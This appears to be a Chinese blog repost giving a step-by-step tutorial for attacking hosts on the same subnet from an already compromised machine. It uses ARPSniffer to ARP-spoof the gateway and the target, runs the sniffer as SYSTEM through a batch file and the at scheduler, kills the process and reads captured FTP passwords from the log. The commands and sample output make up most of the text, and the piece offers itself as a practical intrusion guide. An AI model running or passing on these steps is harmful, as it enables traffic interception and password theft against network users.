• C段渗透攻击必看的技术知识


    假设想攻击的主机IP是:61.139.1.79
    同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆
     
    第一步:
    tracert 61.139.1.1
     
    C:WIN2000system32>tracert 61.139.1.1
     
    Tracing route to HACK-4FJ7EARC [61.139.1.1]
    over a maximum of 30 hops:
     
      1   <10 ms   <10 ms   <10 ms  HACK-4FJ7EARC [61.139.1.1]
     
    Trace complete.
     
    这就说明了你想攻击的主机和你所在的主机在一个关网中那么就有可能
    进行ARPSNIFFER了
     
    第二步:看本机IP设置和网卡情况
    C:WIN2000system32>ipconfig /all
     
    Windows 2000 IP Configuration
     
            Host Name . . . . . . . . . . . . : smscomputer
            Primary DNS Suffix  . . . . . . . :
            Node Type . . . . . . . . . . . . : Broadcast
            IP Routing Enabled. . . . . . . . : No
            WINS Proxy Enabled. . . . . . . . : No
     
    Ethernet adapter Intel Fast Ethernet LAN Controller - onboard:
     
            Connection-specific DNS Suffix  . :
            Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection
            Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6
            DHCP Enabled. . . . . . . . . . . : No
            IP Address. . . . . . . . . . . . : 61.139.1.2
            Subnet Mask . . . . . . . . . . . : 255.255.255.0
            Default Gateway . . . . . . . . . : 61.139.1.65
            DNS Servers . . . . . . . . . . . : 61.139.1.73
     
    说明只有一块网卡那么在执行ARPSNIFFER的时候就可以不要第五个参数了这个地
    方小榕的主页可没有说哟,经过测试我发觉如果只有一块网卡你第五个参数使用0
    的话也只能嗅探到通过自已的数据哟.
    从上面我们还可以知道网关是61.139.1.65
     
    第三步:查看本机时间
    C:WIN2000system32>net time \127.0.0.1
     
    \127.0.0.1 的当前时间是 2003/1/28 下午 09:13
     
    命令完成成功
     
    要注意的是这儿的时间是12小时式,用at命令应要24小时式
     
    第四步:编写启动ARPsniffer的bat文件
    C:WIN2000system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:winnta.bat
     
    注意咯我们没有要第五个参数,如果有多个网卡的话你就要先直接执行arpsniffer显示如下:
    ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
    www.netXeyes.com 2002, security@vip.sina.com 
     
    Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter
    Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(这个地方选第五个参数)
     
    Usage: ArpSniffer <IP1> <IP2> <Sniffer TCP Port> <LogFile> <NetAdp> [/RESET]
     
    第五步:后台运行开始嗅探咯
    C:winntsystem32>at \127.0.0.1 20:44 c:winnta.bat
     
    注意:这儿的时间要用24小时式
         arpsniffer最好拷到system32目录下,记录文件也会生成在这儿
         执行完第四步要先安装WINPCAP 2.1驱动
         同时arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改注册表重启机子
     
    第六步:看密码但是生成的记录文件不能直接看也不能拷贝所以我们只能先结束掉
    以SYSTEM权限启动的ARPSniffer程序
    C:winntsystem32>pulist
    ...................
    conime.exe        248  NT AUTHORITYSYSTEM
    explorer.exe      1864 SMSCOMPUTERAdministrator
    CSRSS.EXE         2256 NT AUTHORITYSYSTEM
    Arpsniffer.exe    2322 NT AUTHORITYSYSTEM       ----就是它了!
    WINLOGON.EXE      2344 NT AUTHORITYSYSTEM
    ......................
     
    杀了它
    C:winntsystem32>pskill 2322
    PsKill v1.03 - local and remote process killer
    Copyright (C) 2000 Mark Russinovich
    http://www.sysinternals.com 
     
    Process 2322 killed.
     
    C:winntsystem32>type 1.txt       我的例子中嗅探的是FTP密码:)
     
    ...............
    61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb
    61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.
    61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.
    61.188.218.179(1404)->61.139.1.79(21)QUIT
    61.188.218.179(1404)->61.139.1.79(21)QUIT
    61.139.1.79(21)->61.188.218.179(1404)221
    61.139.1.79(21)->61.188.218.179(1404)221
    ............
    ............
     
    特别要注意的就是PASS哈:)
     
    付录:
    前台正常执行的显示
     
    C:>arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset
     
    ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
    www.netXeyes.com 2002, security@vip.sina.com 
     
    Network Adapter 0: Intel(R) 8255x Based Network Connection
     
    Enable IP Router....OK
     
    Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02
    Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb
    Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6
     
    Spoof 61.139.1.79: Mac of 61.139.1.65 ===> Mac of 61.139.1.88
    Spoof 61.139.1.65: Mac of 61.139.1.79 ===> Mac of 61.139.1.88
    有时这儿要先显示can not open driver(0)不管它等一下就可以了
    Begin Sniffer.........
  • 相关阅读:
    Java上传图片
    git下拉项目失败,报错 RPC failed; curl 56 OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 10054
    关于Java项目启动后浏览器访问本机磁盘里的图片报错Not allowed to load local resource
    window安装Redis和springboot整合Redis进行简单使用
    Java强弱密码校验,必须包含大小写字母、数字、特殊符号
    工作记录:C# ashx生成验证码图片及校验
    springboot配置逆向工程
    mysql学习总结(二)
    ISM模型:用python实现可达矩阵求解和层级划分
    mysql学习总结(一)
  • 原文地址:https://www.cnblogs.com/h2zZhou/p/6233265.html
Copyright © 2020-2023  润新知